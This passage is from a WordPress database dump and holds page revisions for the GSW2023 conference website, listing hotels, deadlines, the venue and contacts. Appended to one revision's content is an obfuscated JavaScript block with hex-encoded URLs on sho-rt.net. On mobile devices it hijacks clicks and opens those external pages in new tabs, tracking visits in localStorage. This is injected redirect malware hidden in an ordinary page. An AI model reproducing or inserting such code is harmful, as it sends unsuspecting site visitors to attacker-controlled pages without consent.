css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is Sep. 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"200\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 17:08:13','2023-08-15 17:08:13','',3066,'https://gsw2023.com/?p=5206',0,'revision','',0),
(5207,1,'2023-08-15 17:09:46','2023-08-15 17:09:46','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner 